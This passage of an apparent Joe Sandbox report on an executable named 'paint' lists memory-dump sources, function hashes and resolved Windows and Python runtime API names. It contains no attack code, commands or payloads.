                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA812772A0C78156E774CF19944037A7A92FB46794F904235DABE83BD9EF7EE4008B00
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                • Opcode ID: 0ac6b4c320f8a85a272a2d207e476957e076465a5e78eda0eae0a584ad6410a5
                                                                                                                                                                                                                                                                • Instruction ID: 5c9fdf271c8c6bcaf172e7b3073dd97e586856816253c8a74035ec71a1465622
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ac6b4c320f8a85a272a2d207e476957e076465a5e78eda0eae0a584ad6410a5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07610526E0C29676FB248AA8801427D669CAF52761F940239DE3FD77C5FE7FE8008700
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                • Instruction ID: ee198130ed90acc7f9a5cb2b705a1e3f85bac27b8f891d0875293292d95f18f2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B0519476A1865196E7248B29C04023C33A0FB56B68F644271CF6E877D4EF3BE843CB44
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                • Instruction ID: cf412da7310da430a225ca41011245f15dbfd50eee92b7f0575a9b44f7eb4af3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0351A276A1965192E7248B29C04023C33A1EB46F68FB45571CEAE977E5EF3BE843C740
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                • Instruction ID: 6b8c970c9762ff1942de12af720c3b10726cb097bfc377d932ea203c94ed42cf
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81518436A1865296E7248B29D04023C37A0EB5AB58F744671DE6E977D4EF3BEC43C780
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                                • Instruction ID: 9fd69c61775f77ec1da0db9af4af81c825d612f7616e4e4924b85eef85613cbd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC51B432A18A5196E7248B29C44023837A1EB46F58FB48571CE5EDB7E4EF3BE843C740
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                                • Instruction ID: f32eab3e791b284cbb52b65d844dd065b8f9308c3e99ee83f0e15d724f35ad7c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551B376A1865196EB248B29C44023C37A0EB46F58FA44171CE5EA77E9EF3BED43C740
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                                • Instruction ID: 836eff59c902d9fbd147157f59b6029ab22a642af13fc736e4a5a17c2548f6b3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E51CF3AA1865196E7248B28C05023C23A1EB46F58FB45571CE5E977D9EF3BEC43C780
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                • Instruction ID: 3b2931d968b86fc79f35ce0f3a2766791ea442c57991d52fef3f1567799216b3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5041A972C0D74EA4EF65892809246B856809F63BA1ED852F4DDBBD33C7FD0E6A468101
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                                • Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                                • Instruction ID: ff6440e8219042213bc2f25f94495bfdcfb87629890990739fcb9261a7a10f5a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 814128B2718A5592EF04CF6ADA14169B3A5FB48FD4B49A032DE1ED7B94EE3DD4418300
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                                                                • Instruction ID: 0d0b39d1ce1f7187f5d02932b05ed1837292a3b731d52dfc2a03d9e031f7013d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12404f4f4f1323fea4d4e583727f71dd7b5a0d93f2e51056eadc76cf5c92dd81
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F31B632B18F4282E7649F25684013E66D5AF86BD0F944279EB6FA3BE5EF3DD0124704
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                                • Instruction ID: 8ee55efe46a1599b954dfd0bb33bcd7b166ada8c5c120d50551233eeb44e2666
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bcf48121633763fd2f6aa1741893fa818c421e56c797f7e3558f0bc07bbc94c0
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1F068717182569ADBA88F6DA40262977E0FB483C4FC08039D59DC3B54DE3CD0628F04
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                                • Instruction ID: e323d69542c584f234f333179540efc3eaa8e4c9b712c4e6978e6ba30c01d0b7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9A0022994DC0AF0E7448B40E8905356736FB52311BC00035E06FC22F0BF3EA400D305
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5830
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5842
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5879
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD588B
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58A4
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58B6
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58CF
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58E1
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD58FD
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD590F
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD592B
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD593D
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5959
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD596B
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5987
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD5999
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD59B5
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6F0BD64BF,?,00007FF6F0BD336E), ref: 00007FF6F0BD59C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024953988.00007FF6F0C14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff6f0bd0000_paint.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                                • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                                • Instruction ID: d27a3dc65abff6921c8fa578cb9386e4c3360e7c04281b7a001f2128a5e72cb7
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3422652890EB07F1FB559BA5B91897562A9AF06756FC45035C83F833E0FF7EB5889200
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6F0BD45E4,00000000,00007FF6F0BD1985), ref: 00007FF6F0BD9439
                                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6F0BD88A7,?,?,00000000,00007FF6F0BD3CBB), ref: 00007FF6F0BD821C
                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF6F0BD2810: MessageBoxW.USER32 ref: 00007FF6F0BD28EA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2024803088.00007FF6F0BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F0BD0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024769388.00007FF6F0BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024840692.00007FF6F0BFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2024883931.00007FF6F0C12000.00000004.00000001.01000000.00000003.sdmpDownload File
